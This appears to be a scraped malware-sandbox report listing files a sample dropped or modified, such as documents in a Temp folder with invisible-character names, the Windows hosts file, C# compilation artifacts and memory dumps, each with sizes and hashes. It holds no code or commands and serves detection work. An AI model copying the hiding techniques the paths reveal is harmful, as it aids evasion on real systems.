c717689bf796ff125912d9f30d7a763a11eb91bd9ab09b7201d687604f4cdba0cc1844c1bd7e26b2e3d9524ae1bf02d52319ee9519af0a0f357c120937c10e7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Documents\OpenComplete.docx

Filesize
16KB

MD5
1b69050bd61d79474dd6dd73348319c7

SHA1
e655401306ff936c47aee1684f1aec9f1fbc1f56

SHA256
4cf5a986f4979703223feaed53cd9ad4c76edb13a0ac1e63963b493b7c18257a

SHA512
58008be5ad98022575d2bc847accb3759f7f98b8722e9d4d342a3d5a2e112fe1174b2019dd4a33e544810667a2b28cf8942f82e22926a6aa4b226893385cd9a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Documents\PublishUnblock.docx

Filesize
14KB

MD5
fc8d39b2a3f108cbc750a6fc32aa4187

SHA1
7607ca47b35c63ad1585546413aa8fc264391c34

SHA256
f3a3e6b680388214fea2ccf759033d04203f8e9407bba7d3bcfa2ea46fa54269

SHA512
d394eac8a602f1815fbfdfa6ca1e74e275bed1fdf443ecfeb6b2cb252e88ffe02fae8c3096c8bad5d8a4d5f4bb33ab700cb3739f94ecf285845c8b0d4c91056b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Documents\UnregisterSearch.xlsx

Filesize
10KB

MD5
a4c86014705f1c2150f6141f78b9c629

SHA1
7b60073b32ee3bb1799d1a051d1bfd70007bfb9f

SHA256
082d79a912c57a61998760e626a6c795daaf00ea71f48f8e36280139a4c43085

SHA512
200f10c13a43d98c738c240179e6bc4e6bd32a46e6107fb4e3de983d34231642c9017d49146c933dbb26dce70b63c9eb25dac4f41564f124e346fdd7b8d4c2f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Downloads\BackupRead.vsdm

Filesize
378KB

MD5
c99d6dc2bceccd260aa409db66c7cb75

SHA1
d299fac958a8d4559f1469c97a787184ca5e7ee4

SHA256
3b45abf83a71901d0ee2fa8c033de4030821bf7dfe8736dbec770db515b79ac3

SHA512
4defd61e489de2be3e64c10a19ef5736827377653ddcdef1657a432a85cd90b48ca97b17578d84a3ed9f726b0707b076a4f1b96aeb3562275fc6ca50ef6ca21b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Downloads\ConvertEnter.txt

Filesize
218KB

MD5
6e43087efd0ff695ddf598ce7d366adc

SHA1
b47e8073854cef3447d9df01e10e71720926fc7a

SHA256
7e4d80a6dc04aa1462e008643ec29d766d734b3a643b110435ba58fdabc75732

SHA512
40470a58dc14402ac7825d8eb3263dc1b180948716253ec21fa92d6337ed104505490805677fcab18e96d761a420ad3be8b8033b7eafa2927907d6569abc4452

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‎ \Common Files\Downloads\ProtectExit.docx

Filesize
431KB

MD5
021633c2596a25753871a7ef2e657377

SHA1
db44dab23379ddbec0772d95d9cf91949f487688

SHA256
32807b4a746669ad47bb0f2d25b405d3071b9f09412834e681366d2362e62a39

SHA512
2db79b92fa3b832d42a036fe185ca03bb127121f00b29b846a337852c03004a857f47201df30b214f6f0e0689660889714fc08fcc582b5bdb13852d5f9c2f117

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nno4zpmc\CSC324E2B24675048B0B6FCFBA6BDEB26F.TMP

Filesize
652B

MD5
dd02631d6d6a6b49b598a0721f01ede8

SHA1
5bb43f6bf48ebfcc8165df8957428dfbc71c2b21

SHA256
d105c31318a7aba8884b5e28fa31356f7f78614044b95a71ff263579d3caa483

SHA512
5bf4848c19305e1059cce984f46bc710cee4a78bd7f1642ddd863f12668ec20d2a7b35cab705d51adea47955e4364af8ab6d36d7ac1244814421e269c495acf7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nno4zpmc\nno4zpmc.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nno4zpmc\nno4zpmc.cmdline

Filesize
607B

MD5
e9740b9554a4d71e6e48f20c911d506d

SHA1
38727f2556892a7baae197ee87941f915f2df868

SHA256
6f2843ca00f908c0fb1ed8ca766ae8ba6d24da071de746ef5aef57e6d0b935cb

SHA512
0760a53c87ba03f500ff49ebf060ee9e87a7ac887823630a5bd6e71b1abf193089bf7a92e2a7183edfe23aaf64e14fac3e9e639edf4d6751bbce46534a89896f

Download Submit
memory/716-72-0x000002457F550000-0x000002457F572000-memory.dmp

Filesize
136KB

Download
memory/1768-180-0x000002B23FEE0000-0x000002B23FEE8000-memory.dmp

Filesize
32KB

Download